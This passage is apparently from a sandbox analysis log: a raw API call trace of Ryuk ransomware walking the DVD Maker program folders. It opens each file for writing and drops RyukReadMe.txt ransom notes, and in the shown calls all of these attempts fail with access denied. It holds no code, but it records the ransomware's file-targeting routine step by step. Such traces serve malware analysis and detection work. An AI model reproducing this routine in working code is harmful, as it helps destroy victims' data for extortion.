hTemplateFile=0x0) returned 0xffffffffffffffff [0133.762] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.762] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.762] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.762] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.762] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv", dwFileAttributes=0x80) returned 0 [0133.762] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.762] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.763] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.763] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.763] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.763] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv", dwFileAttributes=0x80) returned 0 [0133.763] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.763] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.763] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.763] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.763] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.763] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.764] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.764] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.764] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.764] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.764] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.764] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.765] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.765] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.765] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.765] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.765] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.766] SetLastError (dwErrCode=0x0) [0133.766] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.768] GetLastError () returned 0x5 [0133.768] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.768] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.768] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.768] SetLastError (dwErrCode=0x0) [0133.768] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.768] GetLastError () returned 0x5 [0133.768] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.768] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.768] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.769] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.769] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.769] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.769] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png", dwFileAttributes=0x80) returned 0 [0133.769] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.769] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.769] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.769] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.769] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.770] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png", dwFileAttributes=0x80) returned 0 [0133.770] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\videowall.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.770] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.770] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.770] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.770] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.770] SetLastError (dwErrCode=0x0) [0133.770] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.770] GetLastError () returned 0x5 [0133.770] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.770] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.770] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.770] SetLastError (dwErrCode=0x0) [0133.770] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.770] GetLastError () returned 0x5 [0133.770] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.770] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.771] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.772] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.772] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.772] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.772] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0133.772] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.772] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.772] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.772] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.772] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.773] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png", dwFileAttributes=0x80) returned 0 [0133.773] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.773] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.773] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.773] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.773] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.773] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.773] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.773] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.773] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.774] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.774] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.774] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.774] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.774] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.774] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.774] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.774] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.774] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.774] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.775] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.775] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.775] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.775] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.775] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.775] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.775] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.775] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.775] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.775] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.775] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.776] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.776] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.776] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.776] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.776] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.776] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.776] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.776] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.776] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.776] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.776] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.777] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png", dwFileAttributes=0x80) returned 0 [0133.777] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\softedges.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.777] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.777] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.777] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.777] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.777] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png", dwFileAttributes=0x80) returned 0 [0133.777] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\vignettemask25.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.777] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.777] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.777] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.777] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.778] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png", dwFileAttributes=0x80) returned 0 [0133.778] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\whiteband.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.778] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.778] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.778] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.778] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.779] SetLastError (dwErrCode=0x0) [0133.779] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.781] GetLastError () returned 0x5 [0133.781] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.781] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.781] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.781] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.782] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png", dwFileAttributes=0x80) returned 0 [0133.782] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\whitedot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.782] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.782] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.782] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.782] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.782] SetLastError (dwErrCode=0x0) [0133.782] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.782] GetLastError () returned 0x5 [0133.782] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.782] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.782] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.782] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.782] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\Filters.xml", dwFileAttributes=0x80) returned 0 [0133.783] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\Filters.xml" (normalized: "c:\\program files\\dvd maker\\shared\\filters.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.783] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.783] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.783] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.783] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.783] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\Parity.fx", dwFileAttributes=0x80) returned 0 [0133.783] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\Parity.fx" (normalized: "c:\\program files\\dvd maker\\shared\\parity.fx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.783] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.783] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.783] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0133.783] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0133.783] SetLastError (dwErrCode=0x0) [0133.783] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.784] GetLastError () returned 0x5 [0133.784] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0133.784] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.784] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0133.784] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.784] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\soniccolorconverter.ax", dwFileAttributes=0x80) returned 0 [0133.784] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\soniccolorconverter.ax" (normalized: "c:\\program files\\dvd maker\\soniccolorconverter.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.784] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.784] VirtualFree 